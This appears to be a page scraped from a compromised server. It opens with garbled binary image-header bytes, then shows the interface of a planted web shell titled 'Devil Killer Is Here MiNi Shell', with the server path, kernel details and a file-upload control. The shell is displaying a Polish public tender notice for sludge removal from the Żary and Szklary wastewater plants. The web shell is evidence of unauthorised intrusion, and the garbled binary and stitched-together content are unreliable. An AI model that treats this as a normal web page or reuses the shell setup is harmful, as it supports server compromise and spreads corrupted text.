JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231207/0053739401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór, transport i zagospodarowanie osadów ściekowych pochodzących z Oczyszczalni ścieków w Żarach oraz Oczyszczalni ścieków w Szklarach w 2024 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD WODOCIĄGI GMINNE W JERZMANOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350962245</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rajska 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jerzmanowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-048</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">123895023</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@zwgjerzmanowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zwgjerzmanowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór, transport i zagospodarowanie osadów ściekowych pochodzących z Oczyszczalni ścieków w Żarach oraz Oczyszczalni ścieków w Szklarach w 2024 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-31824177-94dc-11ee-ba3b-4e891c384685</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00537394</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00070183/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Odbiór, transport i zagospodarowanie osadów ściekowych pochodzących z oczyszczalni ścieków w 2024 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-31824177-94dc-11ee-ba3b-4e891c384685 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-31824177-94dc-11ee-ba3b-4e891c384685</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Informacje, oświadczenia lub dokumenty, inne niż określone w pkt 4, przekazywane w postępowaniu, w tym wezwania do uzupełnienia dokumentów, wezwania do złożenia wyjaśnień oraz zawiadomienia o oczywistych omyłkach, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, o których mowa w pkt 2.<br/>2.Postępowanie o udzielenie zamówienia publicznego prowadzi się w języku polskim. Wszelkie pytania do treści SWZ należy kierować do Zamawiającego wyłącznie w języku polskim, odpowiedzi na pytania również będą udzielane wyłącznie w języku polskim.<br/>3.We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania). W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy Przetargowej: Platformy e-Zamówienia <br/>4.Korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>5.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>6.Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. <br/>7.Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: <br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub <br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”). <br/>8.Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2022r. poz. 1233) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. <br/>9.W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem XXXV. INFORMACJA DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZWG.271.7.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zamówienie pn. „Odbiór, transport i zagospodarowanie osadów ściekowych pochodzących z Oczyszczalni ścieków w Żarach oraz Oczyszczalni ścieków <br/>w Szklarach w 2024 roku”<br/>2.	Nazwy i kody dotyczące przedmiotu zamówienia określone we wspólnym słowniku Zamówień Publicznych (CPV):<br/>Główny przedmiot:<br/>90513600-2 - Usługi usuwania osadów<br/>90513700-3 - Usługi transportu osadów<br/>90513800-4 - Usługi obróbki osadów<br/>3.	Przedmiotem zamówienia jest: sukcesywny odbiór i zagospodarowanie ustabilizowanych komunalnych osadów ściekowych poprzez przetwarzanie w procesie R3 (Recykling lub odzysk substancji organicznych, które nie są stosowanie jako rozpuszczalniki (w tym kompostowanie i inne procesy ustabilizowanych komunalnych osadów ściekowych)) zgodnie z załącznikiem nr 1 do ustawy z dnia 14 grudnia 2012 o odpadach (tekst jedn. Dz.U. z 2023r., poz. 1587) – zwanej dalej „ustawą o odpadach” oraz przepisach wykonawczych do tej ustawy.<br/>Przedmiot zamówienia dotyczy następujących odpadów:<br/>•	osadów ściekowych o kodzie 19 08 05,<br/>•	osadów z zawartością tzw. skratek o kodzie 19 08 01,<br/>•	osadów z zawartością piaskowników o kodzie 19 08 02,<br/>pochodzących z mechaniczno-biologicznej oczyszczalni ścieków położonej w m. Żary oraz z mechaniczno-biologicznej oczyszczalni ścieków położonej w m. Szklary, w sposób określony w ofercie wykonawcy, który musi być zgodny z obowiązującymi przepisami prawa regulującymi zagospodarowanie osadów ściekowych. <br/>4.	Zamówienie obejmuje także transport opisanych w pkt 3 osadów ściekowych ze wskazanych powyżej oczyszczalni ścieków oraz udostępnienie szczelnych kontenerów <br/>w celu ciągłego gromadzenia osadów na oczyszczalniach. <br/>W ramach zamówienia Zamawiający wymaga ciągłego udostępnienia co najmniej <br/>4 kontenerów w następującej konfiguracji:<br/>•	dwóch kontenerów (bramowe, samowyładowcze, jeden o wielkości 12-20m3 na osad oraz jeden o wielkości 3-5 m3 na skratki i piasek) na plac oczyszczalni ścieków w Żarach.<br/>•	dwóch kontenerów (bramowe, samowyładowcze, o wielkości minimum 7 m3 na osad) na teren oczyszczalni ścieków w Szklarach. Kontener powinien zostać dopasowany do pomieszczenia gromadzenia osadu i umożliwiać jego samo-załadunek bezpośrednio z pomieszczenia - (konieczne zastosowanie kontenera na co najmniej 2 kółkach). Brama wjazdowa do pomieszczenia kontenera na osad ma szerokość 3,05 m i wysokość 2,60 m. Długość pomieszczenia wynosi 8,0 m. Maksymalna długość podjazdu do bramy (odległość od bramy wjazdowej do krawężnika podjazdu) wynosi 10,5 m. <br/>Kontenery powinny być przystosowane do rodzaju zastosowanego środka transportu umożliwiającego samo-załadunek kontenera.<br/>5.	Przewidywana, szacunkowa ilość osadów w skali roku, będąca przedmiotem niniejszego zamówienia wynosi: <br/>a)	Ustabilizowany osad ściekowy (Nr kodu – 190805) - ok. 480 Mg,<br/>b)	Osad ściekowy – skratki (Nr kodu – 190801) - ok. 21 Mg <br/>c)	Osad z zawartością piaskowników (Nr kodu – 190802) - ok. 38 Mg <br/>Ilość osadów przeznaczonych do wywozu i zagospodarowania w skali miesiąca to średnio: <br/>a)	Ustabilizowany osad ściekowy (Nr kodu – 190805) -	ok. 40,0 Mg,<br/>b)	Osad ściekowy – skratki (Nr kodu – 190801) - ok. 1,7 Mg, <br/>c)	Osad z zawartością piaskowników (Nr kodu – 190802) - ok. 3,2 Mg.<br/>Powyższe ilości są uzależnione od pory roku i przebiegu procesów technologicznych na oczyszczalniach.<br/>6.	Przetwarzanie ustabilizowanych komunalnych osadów ściekowych może odbywać się wyłącznie zgodnie z zasadami przewidzianymi w ustawie o odpadach oraz przepisach wykonawczych do tej ustawy.<br/>7.	Oferent musi posiadać wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (BDO) odpowiednio w zakresie przetwarzania odpadów oraz transportu osadów ściekowych.<br/>8.	Oferent musi posiadać aktualne zezwolenia i dopuszczenia związane z realizacją zadania zgodnie z ustawą o odpadach, a w szczególności:<br/>a)	Zezwolenia na transport osadów, <br/>b)	Pozwolenia na prowadzenie działalności przetwarzania odpadów organicznych w procesie R3 zgodnie z załącznikiem nr 1 do „ustawy o odpadach” Wykonawca wybrany w niniejszym postępowaniu będzie zobowiązany do oznaczania <br/>w każdej karcie przekazania odpadów rodzaj procesu przetwarzania, któremu powinien zostać poddany odpad oraz kod odpadu.<br/>9.	Wywóz osadów odbywać się będzie co najmniej raz w miesiącu (z częstotliwością uzgodnioną w drodze porozumienia stron). Obowiązek odebrania osadów od Zamawiającego aktualizuje się za każdym razem, z chwilą złożenia zamówienia przez Zamawiającego (w formie telefonicznej lub pisemnej). Wykonawca jest zobowiązany do wykonania usługi w terminie wskazanym w ofercie. Wskazany przez Wykonawcę w ofercie termin odbioru nie może być dłuższy niż 72 godziny od momentu otrzymania informacji o zapotrzebowaniu.<br/>10.	Odbiór osadów będzie potwierdzany Kartą Przekazania Odpadów (wg aktualnych wzorów kart zgodnych z obowiązującymi przepisami prawa) sporządzaną każdorazowo przy odbiorze osadów w systemie Bazy Danych o Odpadach (BDO). Wykonawca zobowiązany jest do ważenia każdej partii odebranych osadów i sporządzenia na tę okoliczność dokumentu.<br/>11.	Po odebraniu przez Wykonawcę komunalnych osadów ściekowych od Zamawiającego pełna odpowiedzialność za nie, przechodzi na Wykonawcę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90513600-2 - Usługi usuwania osadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90513700-3 - Usługi transportu osadów</p> <p class="mb-0">90513800-4 - Usługi obróbki osadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w dokumentach zamówienia.<br/>Najkorzystniejsza oferta to oferta, która uzyskała największą sumaryczną liczbę punktów na podstawie kryteriów oceny ofert określonych w dokumentach zamówienia. <br/>Jeżeli Zamawiający nie będzie mógł wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę <br/>w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem, a jeżeli nie można dokonać wyboru oferty w taki sposób, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.<br/>2.	Kryteria oceny złożonych ofert.<br/>a)	cena oferty – 60% (P1)<br/>b)	termin wywozu osadu – 10 % (P2)<br/>c)	termin płatności faktury – 30 % (P3)<br/>3.	W trakcie oceny ofert kolejno ocenianym ofertom przyznawane będą punkty wg następujących wzorów i punktacji:<br/>a) cena oferty – 60% (P1),<br/>Zamawiający będzie oceniał ofertę w kryterium cena wg wzoru:<br/> najniższa oferowana cena spośród <br/> złożonych ofert<br/>(P1) cena oferty = ------------------------------------------------------- x 60 pkt <br/> cena badanej oferty<br/><br/><br/>b) termin wywozu osadu – 10 % (P2)<br/>Wymagany przez Zamawiającego najdłuższy termin wywozu osadu – do 3 dni kalendarzowych od dnia złożenia zamówienia. Za zaoferowanie tego terminu wykonawca otrzyma 0 punktów w tym kryterium.<br/>Wykonawca będzie premiowany za zaoferowane krótszego terminu wywozu osadu.<br/>Zamawiający przyzna punktację za powyższe kryterium w następujący sposób:<br/>•	Wykonawca, który wskaże w ofercie termin wywozu osadu do 2 dni kalendarzowych od dnia złożenia zamówienia – 5 pkt.<br/>•	Wykonawca, który wskaże w ofercie termin wywozu osadu do 1 dni kalendarzowych od dnia złożenia zamówienia – 10 pkt.<br/>UWAGA: Niedopuszczalne jest wskazanie innych jak powyżej wymienione terminy wywozu przedmiotu zamówienia. W przypadku, gdy Wykonawca wskaże termin wywozu zamówienia powyżej 3 dni kalendarzowych od dnia złożenia zamówienia wówczas jego oferta – jako niezgodna z treścią SWZ – zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp.<br/>c)	termin płatności faktury – 30 % (P3),<br/>Zamawiający dopuszcza minimalny termin płatności faktury na 21 dni. Wykonawca, który zadeklaruje jeden z terminów płatności jak poniżej, otrzyma stosownie:<br/>•	za 21 dniowy termin płatności – 0 pkt,<br/>•	za 25 dniowy termin płatności – 15 pkt<br/>•	za 30 dniowy termin płatności – 30 pkt<br/>UWAGA: Niedopuszczalne jest wskazanie terminów płatności faktury poniżej 21 dni.<br/>W przypadku, gdy Wykonawca wskaże termin poniżej 21 dni, jego oferta – jako niezgodna z treścią SWZ – zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp.<br/>4.	Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów (P), będącą sumą punktów przyznanych w poszczególnych kryteriach:<br/>P = P(1) + P(2) + P(3) <br/>5.	Wykonawca nie może samodzielnie zmieniać i wprowadzać dodatkowych pozycji do oferty.<br/>6.	Wszelkie rozliczenia między Zamawiającym i Wykonawcą będą prowadzone w walucie PLN.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wywozu osadu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy:<br/>a)	W postępowaniu o udzielenie zamówienia mogą brać udział wykonawcy, którzy:<br/>nie podlegają wykluczeniu;<br/>b)	spełniają warunki udziału w postępowaniu zgodnie z art. 57 ustawy Pzp, dotyczące:<br/>•	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>•	sytuacji ekonomicznej i finansowej,<br/>•	zdolności technicznej i zawodowej,<br/>•	zdolności do występowania w obrocie gospodarczym.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego w okolicznościach, <br/>o których mowa w art. 108 ust. 1 ustawy. <br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden <br/>z Wykonawców nie może podlegać wykluczeniu z postępowania na podstawie art. 108 ust. 1 ustawy Pzp, <br/>4.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy przedłożą:<br/>a)	w zakresie posiadania uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: zezwolenia lub wpisy do rejestrów związane z prowadzeniem działalności, objętej niniejszym zamówieniem, zgodnie z obowiązującymi przepisami prawa, lub oświadczenie Wykonawcy o zwolnieniu z obowiązku posiadania zezwoleń lub wpisów, ze wskazaniem podstawy prawnej;<br/>b)	w zakresie posiadania sytuacji ekonomicznej lub finansowej – Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>c)	w zakresie posiadania zdolności technicznej lub zawodowej – Zamawiający wymaga, aby Wykonawca w okresie ostatnich trzech lat przed terminem składnia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje z należytą starannością co najmniej dwa zamówienia, dotyczące wywozu osadów ściekowych o kodach 19 08 01, 19 08 02 oraz 19 08 05 o wartości nie mniejszej niż 50.000 zł brutto każde oraz przedłoży dowody potwierdzające, że usługi te zostały wykonane lub są 